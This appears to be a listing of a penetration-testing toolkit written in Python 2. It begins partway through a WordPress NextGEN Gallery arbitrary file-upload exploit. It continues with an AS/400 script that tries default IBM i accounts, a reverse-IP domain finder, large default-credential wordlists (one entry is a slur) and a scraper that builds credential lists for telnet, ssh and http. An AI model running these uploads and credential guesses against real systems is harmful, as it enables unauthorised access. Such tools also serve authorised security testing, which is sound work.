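        if(exists(uriPath)):
            print "[*] Wordpress Plugin: NextGEN Gallery found"

            # Binary mode: the payload is shipped as an image part, and text
            # mode would rewrite line endings on Windows.
            with open(args['file'], "rb") as f:
                inputData = f.read()

            data = [('name','name'),('galleryselect','1')]
            fileParts = [('Filedata','file1.gif',inputData)]
            if "?p=1&nggupload=" not in args['uri']:
                uri = args['uri']+"/?p=1&nggupload="
            else:
                uri = args['uri']
            response = post_multipart(args['ip'],uri,data,fileParts)
            # Only the status is inspected; the response body is ignored, so a
            # 200 from a handler that rejected the file is still reported as
            # success -- TODO confirm what the plugin answers on rejection.
            if response[0]==200:
                print "[*] File has been uploaded successfully. Please check the below location\n"
                print "******************************************************************************"
                # Cut the query string off with split(), not str.strip():
                # strip() removes *characters* from the set "?p=1&nggupload=",
                # so a URI such as "/wp?p=1&nggupload=" lost its trailing 'p'
                # and the separating "/" was never re-added.
                basePath = uri.split('?', 1)[0]
                if not basePath.endswith('/'):
                    basePath += '/'
                print "http://"+args['ip']+basePath+"wp-content/[gallery_name]/file1.gif"
                print "******************************************************************************"
        else:
            print "[*] Wordpress Plugin: NextGEN Gallery NOT found"


# ---- /as400/CodePage.py ----
"""
CodePage
Used to convert ascii to ebcdic and ebcdic to ascii
Created by Kenneth J. Pouncey 2002-05-18
Changed by Nate Custer - 2002-05-22
    Used some different data types to improve performance/memory usage.
    Used a dict (hash table) instead of a list for the lookup tables.
    The performance of a lookup is faster if you use a dict. Also; used a
    tuple instead of a list for the list at the start. Since tuples aren't
    mutable the python interpreter uses less memory to store them.
Cleaned up by P. Bielen - 2002-05-23
    Managed a length of 75 characters at one line, to prevent a lot of
    editors to do a word-wrap.
"""

__all__ = ["CodePage"]

# Tunable parameters
DEBUGLEVEL = 0

# Conversion table generated mechanically by Free `recode' 3.5
# for sequence IBM037..ISO-8859-1 (reversible).
# Index = EBCDIC byte value, entry = the ISO-8859-1 code point it maps to.
# The table is reversible, so setCodePage derives the inverse from it.
codePage37 = (
    0, 1, 2, 3, 156, 9, 134, 127, 151, 141, 142, 11,
    12, 13, 14, 15, 16, 17, 18, 19, 157, 133, 8, 135,
    24, 25, 146, 143, 28, 29, 30, 31, 128, 129, 130, 131,
    132, 10, 23, 27, 136, 137, 138, 139, 140, 5, 6,
    7, 144, 145, 22, 147, 148, 149, 150, 4, 152, 153, 154,
    155, 20, 21, 158, 26, 32, 160, 226, 228, 224, 225, 227,
    229, 231, 241, 162, 46, 60, 40, 43, 124, 38, 233, 234,
    235, 232, 237, 238, 239, 236, 223, 33, 36, 42, 41,
    59, 172, 45, 47, 194, 196, 192, 193, 195, 197, 199, 209,
    166, 44, 37, 95, 62, 63, 248, 201, 202, 203, 200,
    205, 206, 207, 204, 96, 58, 35, 64, 39, 61, 34,
    216, 97, 98, 99, 100, 101, 102, 103, 104, 105, 171,
    187, 240, 253, 254, 177, 176, 106, 107, 108, 109, 110,
    111, 112, 113, 114, 170, 186, 230, 184, 198, 164, 181,
    126, 115, 116, 117, 118, 119, 120, 121, 122, 161, 191,
    208, 221, 222, 174, 94, 163, 165, 183, 169, 167, 182, 188,
    189, 190, 91, 93, 175, 168, 180, 215, 123, 65, 66,
    67, 68, 69, 70, 71, 72, 73, 173, 244, 246, 242, 243,
    245, 125, 74, 75, 76, 77, 78, 79, 80, 81, 82, 185,
    251, 252, 249, 250, 255, 92, 247, 83, 84, 85, 86, 87,
    88, 89, 90, 178, 212, 214, 210, 211, 213, 48, 49, 50,
    51, 52, 53, 54, 55, 56, 57, 179, 219, 220, 217, 218,
    159,
)


class CodePage:  # CodePage class.
    """Bidirectional CP037 (EBCDIC) <-> ISO-8859-1 byte lookup.

    Only code page 37 is tabled; any other ``codePage`` value silently falls
    back to it (see setCodePage).
    """

    def __init__(self, codePage=None):  # Constructor.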
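# as400/CodePage.py, continued: body of CodePage.__init__ and the remaining methods.
        if codePage:
            self.setCodePage(codePage)
        else:
            self.setCodePage(37)

    def setCodePage(self, codePage):
        """(Re)build both lookup dicts for ``codePage``.

        self.ebcdic maps EBCDIC byte -> ISO-8859-1 code point and self.ascii
        is the inverse.  Only CP037 exists in this module: every other number
        silently gets the CP037 table, exactly as the original did, so a
        caller passing e.g. 500 is not told anything is wrong.
        """
        self.ascii = {}
        self.ebcdic = {}
        cp = codePage37  # the only table we have, whatever was asked for
        for ebcdicByte, latin1Byte in enumerate(cp):
            self.ebcdic[ebcdicByte] = latin1Byte
            self.ascii[latin1Byte] = ebcdicByte

    def getEBCDIC(self, index):
        """EBCDIC byte for ISO-8859-1 code point ``index`` (KeyError when unmapped)."""
        return self.ascii[index]

    def getEBCDICChar(self, index):
        """Same as getEBCDIC but as a one-character string."""
        return chr(self.ascii[index])

    def getASCII(self, index):
        """ISO-8859-1 code point for EBCDIC byte ``index`` (KeyError when unmapped)."""
        return self.ebcdic[index]

    def getASCIIChar(self, index):
        """Same as getASCII but as a one-character string."""
        return chr(self.ebcdic[index])

    def ebcdic2uni(self, index):
        """Alias of getASCIIChar: EBCDIC byte -> character."""
        return self.getASCIIChar(index)

    def uni2ebcdic(self, index):
        """Character -> EBCDIC byte as a one-character string."""
        return self.getEBCDICChar(ord(index))


# ---- /as400/testAS400.py ----
import argparse
import time
import sys
import Session
import Screen5250
import ScreenFields
import CodePage
from sys import argv
__all__ = ["testsession"]
# Shared with the screen listener below: the active screen object and the
# last sign-on rejection text read from it.
myScreen = None
foundText = ""


class testsession:
    """Screen listener that types one USERID/PASSWORD pair into the sign-on
    screen and records any rejection message the host displays."""

    def __init__(self):
        self.first = 1          # host screen updates seen; credentials are typed on the first
        self.USERID = None
        self.PASSWORD = None

    def outputScreen(self, initiator, startRow, startColumn, endRow, endColumn):
        """Callable method to get screen updates (registered via add_screen_listener)."""
        if initiator == 0:  # 0 is from client and 1 is from host
            return
        fields = myScreen.getFields()
        if self.USERID is None or self.PASSWORD is None:
            self.USERID = raw_input("What's your username ? > ")
            self.PASSWORD = raw_input("What's your password ? > ")
        if self.first == 1:
            # Assumes field 0 is the user and field 1 the password entry of
            # the sign-on screen -- TODO confirm against a real host.
            field = fields.getItem(0)
            field.setString(self.USERID)
            field = fields.getItem(1)
            field.setString(self.PASSWORD)

        global foundText
        for idx in range(1, 25):  # every row of the 24x80 screen
            output = myScreen.getPlaneData(idx, 1, idx, 80, 1)
            if "does not exist" in output:
                foundText = output
            if "cannot sign on" in output:
                foundText = output
            if "No password associated" in output:
                foundText = output

        if self.first < 7:
            myScreen.sendAidKey(0xF1)  # AID key (presumably Enter); sent on up to six updates
            self.first += 1


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-i',dest='hostIP',action='store',help='[IP of AS/400 host]')
    parser.add_argument('-p',dest='portNo',action='store',help='[Port of AS/400 host]')
    options = parser.parse_args()

    if len(sys.argv)==1:
        parser.print_help()
        sys.exit()
    else:
        if options.hostIP and options.portNo:
            # IBM i default / service profiles, tried with password == profile name.
            userList = [
                ('QSECOFR','QSECOFR'),
                ('QPGWR','QPGWR'),
                ('QUSER','QUSER'),
                ('QSYSOFR','QSYSOFR'),
                ('QSRVBAS','QSRVBAS'),
                ('QSRV','QSRV'),
                ('QDFTOWN','QDFTOWN'),
            ]

            host = options.hostIP

            for user in userList:
                # Reset the shared result before every attempt: previously a
                # rejection text from one profile was reported for every
                # profile tested after it, since nothing ever cleared it.
                foundText = ""
                ts = testsession()
                ts.USERID = user[0]
                ts.PASSWORD = user[1]
                print "\n[*] Testing ("+user[0]+"|"+user[1]+")"
                session = Session.Session(host)
                # NOTE(review): this assigns an attribute *named* setPort; if
                # Session exposes setPort() as a method the port is never
                # applied -- verify against Session.py, which is not in view.
                session.setPort = options.portNo
                session.set_debuglevel(0)
                myScreen = session.getScreen()
                session.getScreen().add_screen_listener(ts.outputScreen)
                session.connect()
                time.sleep(2)  # fixed wait for the host to answer; presumably the listener runs asynchronously
                if len(foundText.strip())>0:
                    print foundText
                else:
                    print "It might be possible to login with ("+user[0]+"|"+user[1]+")"

                session.disconnect()
            sys.exit()


# ---- /ip2domains.py ----
import argparse
import urllib2, socket,sys,base64,os
from xml.dom.minidom import parse, parseString
import socket
from urlparse import urlparse
import commands


# Bing Search API key.  It used to be committed in this file; a key pushed to
# a repository must be treated as leaked and rotated, so it is now read from
# the environment.  An unset variable yields "", which the __main__ block
# rejects ("Please check your bingAPIKey") before any lookup is attempted.
bingAPIKey = os.environ.get('BING_API_KEY', '')


def isOpen(ip, port, timeout=None):
    """Return True when a TCP connect to (ip, port) succeeds.

    ``timeout`` (seconds) is optional; the default keeps the original
    behaviour of waiting for the OS connect timeout.  The socket is closed on
    every path -- the original leaked it whenever connect failed.
    """
    s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    if timeout is not None:
        s.settimeout(timeout)
    try:
        s.connect((ip, int(port)))
        s.shutdown(2)
        return True
    except (socket.error, ValueError, TypeError):
        return False
    finally:
        s.close()


def RunCommand(fullCmd):
    """Run ``fullCmd`` through the shell and return its combined output.

    commands.getoutput hands the string to /bin/sh, so callers must build it
    only from validated pieces (see getSSLcertname).
    """
    try:
        return commands.getoutput(fullCmd)
    except Exception:
        return "Error executing command %s" %(fullCmd)


def getIP(domain):
    """Forward-resolve ``domain``; "" when it does not resolve."""
    try:
        return socket.gethostbyname(domain)
    except socket.gaierror:
        return ""


def getSSLcertname(ip):
    """Return the commonName of the certificate on ``ip``:443 as printed by
    nmap's ssl-cert script, or None when there is no usable, non-wildcard one.

    ``ip`` is interpolated into a shell command line, so it must be a literal
    IPv4 address: the __main__ filter only rejects strings containing letters,
    which still lets shell metacharacters such as ';' or '$(' through.
    """
    try:
        socket.inet_aton(ip)
    except (socket.error, TypeError):
        return None
    fullCmd = "nmap --script=ssl-cert -p 443 "+ip
    results = RunCommand(fullCmd)
    resultsList = results.split("\n")
    for line in resultsList:
        if "| ssl-cert: Subject: commonName=" in line and "*." \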
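not in line:
            hostName = line.replace("| ssl-cert: Subject: commonName=","").split("/")[0]
            hostName = hostName.strip()
            if hostName:
                return hostName


def reverseBing(ip):
    """Collect the host names Bing indexes for ``ip`` (query ``ip:<addr>``),
    keeping only those that still resolve to ``ip``.  When port 443 answers,
    the certificate commonName is added first.

    Four pages (skip 0, 50, 100, 150 with $top=100, overlapping as in the
    original) are requested.  A page that fails with URLError is skipped;
    the original ``continue``d without advancing ``skip`` and therefore
    looped forever on a persistent error such as a rejected API key.
    """
    sites = []
    skip = 0
    top = 100
    port = 443
    if isOpen(ip, port):
        certName = getSSLcertname(ip)  # one nmap run instead of two
        if certName:
            sites.append(certName)
    while skip < 200:
        try:
            url = "https://api.datamarket.azure.com/Data.ashx/Bing/Search/v1/Web?Query='ip:%s'&$top=%s&$skip=%s&$format=Atom"%(ip,top,skip)
            request = urllib2.Request(url)
            auth = base64.encodestring("%s:%s" % (bingAPIKey, bingAPIKey)).replace("\n", "")
            request.add_header("Authorization", "Basic %s" % auth)
            res = urllib2.urlopen(request)
            try:
                data = res.read()
            finally:
                res.close()

            xmldoc = parseString(data)
            for site in xmldoc.getElementsByTagName('d:Url'):
                hostPort = site.childNodes[0].nodeValue.split("/")[2]
                domain = hostPort.split(":")[0] if ":" in hostPort else hostPort
                # The host[:port] form is what gets recorded, as before; only
                # names that still point at ``ip`` are kept.
                if hostPort not in sites and ip not in sites and getIP(domain) == ip:
                    sites.append(hostPort)
        except urllib2.URLError:
            pass  # skip this page, but still move on to the next one
        skip += 50
    return sites


def _stripScheme(value):
    """Return the host part of ``value`` when it is written as a URL.

    Kept from the original: the test is a substring match, so a bare name
    containing "http" is also run through urlparse (and becomes "None").
    """
    if "http" in value or "https" in value:
        return str(urlparse(value).hostname)
    return value


parser = argparse.ArgumentParser(description='IP to DNS Name')
parser.add_argument('-host', help='Enter an IP address or Domain name')
parser.add_argument('-file', help='File containing list of IP addresses')
args = parser.parse_args()
if args.host is None and args.file is None:
    print "\n[!] Please run 'python "+sys.argv[0]+" -h'\n"
    sys.exit()
else:
    if args.file:
        with open(args.file) as f:
            ipList = f.read().splitlines()
        for host in ipList:
            tmpHost = _stripScheme(host)
            # Only bare IPs (no letters at all) are sent to Bing; names are echoed.
            if any(c.isalpha() for c in tmpHost)==False:
                if len(bingAPIKey)<1:
                    sys.exit("[!] Please check your bingAPIKey !")
                sites = reverseBing(tmpHost)
                if sites:
                    for site in sites:
                        if site!=None:
                            print tmpHost+"\t"+site
                else:
                    print tmpHost
            else:
                print tmpHost
    elif args.host:
        tmpHost = _stripScheme(args.host)
        if any(c.isalpha() for c in tmpHost)==False:
            if len(bingAPIKey)<1:
                sys.exit("[!] 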
Please check your bingAPIKey !") 122 | sites = reverseBing(tmpHost) 123 | for site in sites: 124 | print tmpHost+"\t"+site 125 | -------------------------------------------------------------------------------- /default_accounts_wordlist/passwords.txt: -------------------------------------------------------------------------------- 1 | 100198 2 | 1064 3 | 11111111 4 | 12345 5 | 123456 6 | 1RRWTTOOI 7 | 2222 8 | 22222222 9 | 31994 10 | 3ep5w2u 11 | 4Dgifts 12 | 4tas 13 | 744 14 | ACCESS 15 | ADMIN 16 | ALLIN1 17 | ALLIN1MAIL 18 | ALLINONE 19 | APPLSYS 20 | ARCHIVIST 21 | AUTORAID 22 | Administrator 23 | Asante 24 | Ascend 25 | BACKUP 26 | BATCH 27 | CAROLIAN 28 | CCC 29 | CHANGE_ON_INSTALL 30 | CHEY_ARCHSVR 31 | CNAS 32 | COGNOS 33 | CONV 34 | Cisco router 35 | DCL 36 | DECMAIL 37 | DECNET 38 | DEFAULT 39 | DEMO 40 | DIGITAL 41 | DISC 42 | DISCAR 43 | FAX 44 | FAXUSER 45 | FAXWORKS 46 | FIELD 47 | FIELD.SUPPORT 48 | GATEWAY 49 | GUEST 50 | GUESTGUE 51 | GUESTGUEST 52 | Guest 53 | HARRIS 54 | HELP 55 | HELPDESK 56 | HOST 57 | HP 58 | HPDESK 59 | HPLASER 60 | HPOFFICE 61 | HPOFFICE DATA 62 | HPONLY 63 | HPP187 64 | HPP187 SYS 65 | HPP189 66 | HPP196 67 | HPWORD PUB 68 | INFO 69 | INGRES 70 | INTX3 71 | INVALID 72 | ITF3000 73 | Intel 74 | LASER 75 | LASERWRITER 76 | LINK 77 | LOTUS 78 | MAIL 79 | MAILER 80 | MANAGER 81 | MANAGER.SYS 82 | MBMANAGER 83 | MBWATCH 84 | MGR 85 | MGR.SYS 86 | MPE 87 | MTYSYS 88 | Mau dib 89 | NETBASE 90 | NETCON 91 | NETFRAME 92 | NETMGR 93 | NETNONPRIV 94 | NETPRIV 95 | NETSERVER 96 | NEWINGRES 97 | NEWS 98 | NF 99 | NFI 100 | NICONEX 101 | NONPRIV 102 | NeXT 103 | No 104 | OP.OPERATOR 105 | OPERATOR 106 | OPERVAX 107 | PASSWORD 108 | PDP11 109 | PDP8 110 | PO8 111 | POST 112 | POSTMASTER 113 | PRINT 114 | PRINTER 115 | PRIV 116 | REGO 117 | REMOTE 118 | REPORT 119 | RJE 120 | ROBELLE 121 | ROOT 122 | RSX 123 | SABRE 124 | SECURITY 125 | SERVICE 126 | SQL 127 | STUDENT 128 | SUPERVISOR 129 | SUPPORT 130 | SYS 131 | SYSLIB 132 | SYSMAINT 133 
| SYSTEM 134 | SYSTEST 135 | SYSTEST_CLIG 136 | SY_MB 137 | Sysop 138 | TCH 139 | TELEDEMO 140 | TELESUP 141 | TEST 142 | TIGER 143 | TRACE 144 | TSEUG 145 | UETP 146 | USER 147 | USERP 148 | USER_TEMPLATE 149 | User 150 | VAX 151 | VESOFT 152 | VMS 153 | WANGTEK 154 | WINDOWS_PASSTHRU 155 | WINSABRE 156 | WORD 157 | XLSERVER 158 | ____BLANK___ 159 | abc123 160 | access 161 | accounting 162 | adm 163 | admin 164 | admin1 165 | adminttd 166 | admn 167 | anon 168 | ascend 169 | atc456 170 | attack 171 | autocad 172 | bbs 173 | bciimpw 174 | bcimpw 175 | bcmspw 176 | bcnaspw 177 | bin 178 | bintec 179 | biodata 180 | bloggs 181 | bluepw 182 | boss 183 | browsepw 184 | c 185 | cascade 186 | cc 187 | ccrusr 188 | changeme 189 | checkfs 190 | checkfsys 191 | checksys 192 | cisco 193 | comcomcom 194 | craft 195 | craftpw 196 | custpw 197 | daemon 198 | danger 199 | default 200 | demos 201 | dhrhdhhhh 202 | dni 203 | enquirypw 204 | enter 205 | fal 206 | fax 207 | field 208 | file 209 | ftp 210 | games 211 | ganteng 212 | gen1 213 | gen2 214 | gopher 215 | guest 216 | guest1 217 | guestgue 218 | halt 219 | hello 220 | help 221 | hp 222 | ibmcel 223 | inads 224 | indspw 225 | initpw 226 | install 227 | james 228 | javascript faggots 229 | kahn 230 | kilo1987 231 | l2 232 | l3 233 | lineprin 234 | locatepw 235 | looker 236 | lp 237 | lpadm 238 | lpadmin 239 | lucenttech1 240 | lucenttech2 241 | lynx 242 | m1122 243 | mail 244 | maint 245 | maintain 246 | maintpw 247 | man 248 | manager 249 | managers 250 | master 251 | masterkey 252 | me 253 | mediator 254 | mfd 255 | mlusr 256 | mountfs 257 | mountfsys 258 | mountsys 259 | my_DEMARC 260 | ncrm 261 | netlink 262 | news 263 | nmspw 264 | nobody 265 | nokia 266 | none 267 | ntacdmax 268 | oem_temp 269 | operator 270 | pakistan 271 | password 272 | passwordguy 273 | patrol 274 | plsdontguess 275 | postmast 276 | powerdown 277 | prime 278 | primenet 279 | primeos 280 | primos 281 | private 282 | qpgmr 283 | qsecofr 284 | qserv 
285 | qsrv 286 | qsrvbas 287 | qsvr 288 | qsysopr 289 | quser 290 | rainbow 291 | rcustpw 292 | replicator 293 | rje 294 | rmnetlm 295 | ro 296 | rw 297 | rwa 298 | rwmaint 299 | sa 300 | sasasa 301 | secoff 302 | secofr 303 | service 304 | shutdown 305 | signa 306 | software 307 | specialist 308 | speedxess 309 | supervisor 310 | support 311 | supportpw 312 | symantec 313 | sync 314 | sys 315 | sysadm 316 | sysadmin 317 | sysbin 318 | syslib 319 | system 320 | system_admin 321 | tele 322 | tellabs#1 323 | tetra 324 | tour 325 | trouble 326 | tutor 327 | uClinux 328 | umountfs 329 | umountfsys 330 | umountsys 331 | unix 332 | utstar 333 | uucp 334 | uucpadm 335 | web 336 | webmaster 337 | www 338 | xxyyzz 339 | year2000 340 | -------------------------------------------------------------------------------- /default_accounts_wordlist/users.txt: -------------------------------------------------------------------------------- 1 | $ALOC$ 2 | 1 3 | 1.1 4 | 11111111 5 | 1234567890 6 | 2 7 | 22222222 8 | 30 9 | 31994 10 | 4Dgifts 11 | 5 12 | 7 13 | ADMIN 14 | ADMN 15 | ADVMAIL 16 | ALLIN1 17 | ALLIN1MAIL 18 | ALLINONE 19 | AP2SVP 20 | APL2PP 21 | APPLSYS 22 | ARCHIVIST 23 | AURORA@ORB@UNAUTHENTICATED 24 | AUTOLOG1 25 | Admin 26 | Administrator 27 | Any 28 | BACKUP 29 | BATCH 30 | BATCH1 31 | BATCH2 32 | CCC 33 | CHEY_ARCHSVR 34 | CMSBATCH 35 | CMSUSER 36 | CPNUC 37 | CPRM 38 | CSPUSER 39 | CTXSYS 40 | CVIEW 41 | DATAMOVE 42 | DBA 43 | DCL 44 | DECMAIL 45 | DECNET 46 | DEFAULT 47 | DEMO 48 | DEMO1 49 | DEMO2 50 | DEMO3 51 | DEMO4 52 | DIRECT 53 | DIRMAINT 54 | DISKCNT 55 | EREP 56 | Ezsetup 57 | FAX 58 | FAXUSER 59 | FAXWORKS 60 | FIELD 61 | FSFADMIN 62 | FSFTASK1 63 | FSFTASK2 64 | GATEWAY 65 | GCS 66 | GEN1 67 | GEN2 68 | GUEST 69 | Guest 70 | HELLO 71 | HELP 72 | HELPDESK 73 | HOST 74 | HPLASER 75 | IDMS 76 | IDMSSE 77 | IIPS 78 | INFO 79 | INGRES 80 | IPFSERV 81 | ISPVM 82 | IS_$hostname 83 | IVPM1 84 | IVPM2 85 | IntraStack 86 | IntraSwitch 87 | LASER 88 | LASERWRITER 
89 | LIBRARY 90 | LINK 91 | LessonUser1 92 | LessonUser2 93 | MAIL 94 | MAILER 95 | MAINT 96 | MANAGER 97 | MBMANAGER 98 | MBWATCH 99 | MCVEADMIN 100 | MGE 101 | MGR 102 | MICRO 103 | MOESERV 104 | MTYSYS 105 | N/A 106 | NETCON 107 | NETMGR 108 | NETNONPRIV 109 | NETPRIV 110 | NETSERVER 111 | NEVIEW 112 | NEWINGRES 113 | NEWS 114 | NICONEX 115 | OLTSEP 116 | OP1 117 | OPERATNS 118 | OPERATOR 119 | OPERVAX 120 | OutOfBox 121 | PCUSER 122 | PDMREMI 123 | PDP11 124 | PDP8 125 | PENG 126 | PO8 127 | POST 128 | POSTMASTER 129 | PRINT 130 | PRINTER 131 | PRIV 132 | PROCAL 133 | PRODBM 134 | PROMAIL 135 | PSFMAINT 136 | PVM 137 | RDM470 138 | REPORT 139 | RJE 140 | RMUser1 141 | ROOT 142 | ROUTER 143 | RSBCMON 144 | RSCS 145 | RSCSV2 146 | SABRE 147 | SAVSYS 148 | SCOTT 149 | SETUP 150 | SFCMI 151 | SFCNTRL 152 | SMART 153 | SPOOLMAN 154 | SQLDBA 155 | SQLUSER 156 | STUDENT 157 | SUPERVISOR 158 | SYS 159 | SYSADM 160 | SYSADMIN 161 | SYSCKP 162 | SYSDBA 163 | SYSDUMP1 164 | SYSERR 165 | SYSMAINT 166 | SYSMAN 167 | SYSTEM 168 | SYSTEST 169 | SYSTEST_CLIG 170 | SYSWRM 171 | Sysop 172 | TDISK 173 | TELEDEMO 174 | TEMP 175 | TEST 176 | TRACESRV 177 | TSAFVM 178 | UETP 179 | USER 180 | USERP 181 | USER_TEMPLATE 182 | User 183 | VASTEST 184 | VAX 185 | VM3812 186 | VMARCH 187 | VMASMON 188 | VMASSYS 189 | VMBACKUP 190 | VMBSYSAD 191 | VMMAP 192 | VMS 193 | VMTAPE 194 | VMTLIBR 195 | VMUTIL 196 | VSEIPO 197 | VSEMAINT 198 | VSEMAN 199 | VTAM 200 | VTAMUSER 201 | WANGTEK 202 | WINDOWS_PASSTHRU 203 | WINSABRE 204 | WP 205 | accounting 206 | adm 207 | admin 208 | admin2 209 | administrator 210 | adminstrator 211 | adminttd 212 | ami 213 | anon 214 | autocad 215 | bbs 216 | bciim 217 | bcim 218 | bcms 219 | bcnas 220 | bin 221 | blue 222 | boss 223 | browse 224 | ccrusr 225 | checkfs 226 | checkfsys 227 | checksys 228 | cisco 229 | config 230 | craft 231 | cust 232 | daemon 233 | demo 234 | demos 235 | deskalt 236 | deskman 237 | desknorm 238 | deskres 239 | diag 240 | disttech 241 
| dni 242 | drhhdrhhd 243 | enable 244 | enquiry 245 | fal 246 | fax 247 | field 248 | file 249 | ftp 250 | ftp_admi 251 | fucking 252 | games 253 | gonzo 254 | gopher 255 | gropher 256 | guest 257 | guest1 258 | halt 259 | handsome_123_handsome 260 | ibm 261 | inads 262 | init 263 | install 264 | intelligent_guy_priyank 265 | james 266 | khan 267 | l2 268 | l3 269 | locate 270 | lp 271 | lpadm 272 | lpadmin 273 | lynx 274 | m1122 275 | mail 276 | maint 277 | man 278 | manager 279 | managers 280 | manuf 281 | me 282 | mediator 283 | memotec 284 | mfd 285 | mlusr 286 | mountfs 287 | mountfsys 288 | mountsys 289 | n/a 290 | ncrm 291 | netlink 292 | netrangr 293 | news 294 | nms 295 | nobody 296 | nop 297 | nuucp 298 | operator 299 | oracle 300 | patrol 301 | postmaster 302 | powerdown 303 | prime 304 | primenet 305 | primos_cs 306 | qpgmr 307 | qsecofr 308 | qserv 309 | qsrv 310 | qsrvbas 311 | qsvr 312 | qsysopr 313 | quser 314 | rcust 315 | readonly 316 | readwrite 317 | replicator 318 | rje 319 | ro 320 | root 321 | rw 322 | rwa 323 | sa 324 | satan 325 | secoff 326 | secofr 327 | setup 328 | sherzad420 329 | shutdown 330 | signa 331 | snake 332 | software 333 | storwatch 334 | stuccoboy 335 | supervisor 336 | support 337 | sync 338 | sys 339 | sysadm 340 | sysadmin 341 | sysbin 342 | system 343 | system_admin 344 | teacher 345 | tech 346 | tele 347 | tellabs 348 | temp1 349 | topicalt 350 | topicnorm 351 | topicres 352 | tour 353 | trouble 354 | tutor 355 | umountfs 356 | umountfsys 357 | umountsys 358 | unix 359 | uucp 360 | uucpadm 361 | web 362 | webmaster 363 | www 364 | -------------------------------------------------------------------------------- /cenzic/url2cenzic.py: -------------------------------------------------------------------------------- 1 | import urllib2 2 | import socket 3 | import argparse 4 | import sys 5 | import multiprocessing 6 | 7 | numProcess=10 8 | default_timeout = 10 9 | socket.setdefaulttimeout(default_timeout) 10 | 11 | def 
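get_redirected_url(url):
    """Follow redirects for ``url`` and return the final URL, or None.

    Any failure -- HTTP error, DNS/connect error, malformed URL, a bad status
    line escaping urllib2 -- yields None: this runs inside worker processes
    and one broken entry must not take a worker down, hence the broad catch.
    The response is closed before returning.
    """
    try:
        opener = urllib2.build_opener(urllib2.HTTPRedirectHandler)
        opener.addheaders = [('User-agent', 'Mozilla/5.0')]
        # No urllib2.install_opener(): the opener is used directly, and
        # installing it globally only changed behaviour for unrelated callers.
        response = opener.open(url)
        try:
            return response.url
        finally:
            response.close()
    except Exception:
        return None


class Worker(multiprocessing.Process):
    """Drain ``work_queue`` of (jobid, url) pairs and push
    (jobid, final_url_or_None) onto ``result_queue``."""

    def __init__(self, work_queue, result_queue):
        # base class initialization
        multiprocessing.Process.__init__(self)
        self.work_queue = work_queue
        self.result_queue = result_queue
        self.kill_received = False  # never set anywhere visible; left as the hook it was

    def run(self):
        while not self.kill_received and not self.work_queue.empty():
            try:
                jobid, url = self.work_queue.get_nowait()
            except Exception:  # queue raced empty between the check and the get
                break
            self.result_queue.put((jobid, get_redirected_url(url)))


def execute(jobs, num_processes=2):
    """Run ``jobs`` ([(jobid, url), ...]) across ``num_processes`` workers and
    return [(jobid, final_url_or_None), ...] sorted by jobid.

    Blocks until every job has reported, so a hung URL hangs the whole run;
    the module-level socket.setdefaulttimeout bounds each request.
    """
    work_queue = multiprocessing.Queue()
    for job in jobs:
        work_queue.put(job)
    result_queue = multiprocessing.Queue()

    workers = [Worker(work_queue, result_queue) for _ in range(int(num_processes))]
    for w in workers:
        w.start()

    results = [result_queue.get() for _ in range(len(jobs))]
    results.sort()  # tuples sort on their first element, the jobid
    return results


if __name__ == '__main__':
    parser = argparse.ArgumentParser()
    parser.add_argument('-f', dest='filename', action='store', help='[filename containing urls]')
    parser.add_argument('-p', dest='projectName', action='store', help='[abbreviation of the project. do not use spaces]')
    parser.add_argument('-o', dest='output', action='store', help='[output cenzic CSV file]')
    options = parser.parse_args()

    if len(sys.argv)==1:
        parser.print_help()
        sys.exit(1)
    else:
        if not options.output:
            print "[!] Please use the -output argument."
        if not options.filename:
            print "[!] Please use the -filename argument."
        if not options.projectName:
            # Previously a missing project name made the script exit silently.
            print "[!] Please use the -p argument."
        if options.filename and options.output and options.projectName:
            resultList=[]
            with open(options.filename) as inputFile:
                lines = inputFile.read().splitlines()
            jobs=[]
            jobid=0
            for line in lines:
                line=line.strip()
                print line
                # Only whole comment lines are skipped.  The original dropped
                # any line *containing* '#', which also discarded every URL
                # that carries a fragment.
                if len(line)>0 and not line.startswith("#"):
                    jobs.append((jobid,line))
                    jobid = jobid+1
            results = execute(jobs,int(numProcess))
            seenUrls = set()
            for result in results:
                finalUrl = result[1]
                if finalUrl is not None and finalUrl not in seenUrls:
                    seenUrls.add(finalUrl)
                    # Columns 7 and 8 are fixed values carried over from the
                    # original; what Cenzic expects in them is not documented here.
                    resultList.append(['"'+finalUrl+'"','"'+options.projectName+"_"+finalUrl+'"',"","","","",'"NetPenScan"','"10/2/2014"'])
            if len(resultList)>0:
                print "\n\n************** Results **************"
                print "Found the below URLs"

                for x in resultList:
                    print x[0]

                # The two output branches used to differ only by a stray
                # trailing comma on the ".csv" path; both now write the same
                # eight columns.
                outPath = options.output if ".csv" in options.output else options.output+".csv"
                with open(outPath, "w") as outFile:
                    for x in resultList:
                        outFile.write(','.join(x)+'\n')
                print "[*] Import "+outPath+" into Cenzic"

            else:
                print "\n\n************** Results **************"
                print "- No URLs found"


# ---- /exploits/cve-2013-7331.html ----
# (the listing shows no content for this file)


# ---- default_accounts_wordlist/getDefaultAccounts,py (apparently; the listing
# resumes at its line 222, so the enclosing loop/function header is not shown) ----
    for result in results:
        if "method" in result.lower():
            if "telnet" in result.lower():
                found=True
            if "ssh" in result.lower():
                found1=True
            if "multi" in result.lower():
                found2=True
            if "http" in result.lower():
                found3=True

    # Cells 4 and 5 of the row are taken to be user name and password;
    # an absent cell yields "".
    result = results[4].strip()
    soup = bs(result)
    p_tags = soup.findAll('td',text=True)
    try:
        username = p_tags[1]
    except IndexError:
        username = ""

    result = results[5].strip()
    soup = bs(result)
    p_tags = soup.findAll('td',text=True)
    try:
        password = p_tags[1]
    except IndexError:
        password = ""

    tmpStr = ":"+str(username)+":"+str(password)

    if found==True:
        if tmpStr not in telnetList:
            telnetList.append(tmpStr)
            telnetfile.write(tmpStr+"\n")
        found=False
    if found1==True:
        print tmpStr
        if tmpStr not in sshList:
            print tmpStr
            sshList.append(tmpStr)
            sshfile.write(tmpStr+"\n")
        found1=False
    if found2==True:
        # "multi" counts for telnet, ssh and http alike.
        if tmpStr not in telnetList:
            telnetList.append(tmpStr)
            telnetfile.write(tmpStr+"\n")
        if tmpStr not in sshList:
            sshList.append(tmpStr)
            sshfile.write(tmpStr+"\n")
        if tmpStr not in httpList:
            httpList.append(tmpStr)
            httpfile.write(tmpStr+"\n")
        found2=False
    if found3==True:
        if tmpStr not in httpList:
            httpList.append(tmpStr)
            httpfile.write(tmpStr+"\n")
        found3=False

telnetfile.close()
sshfile.close()
httpfile.close()

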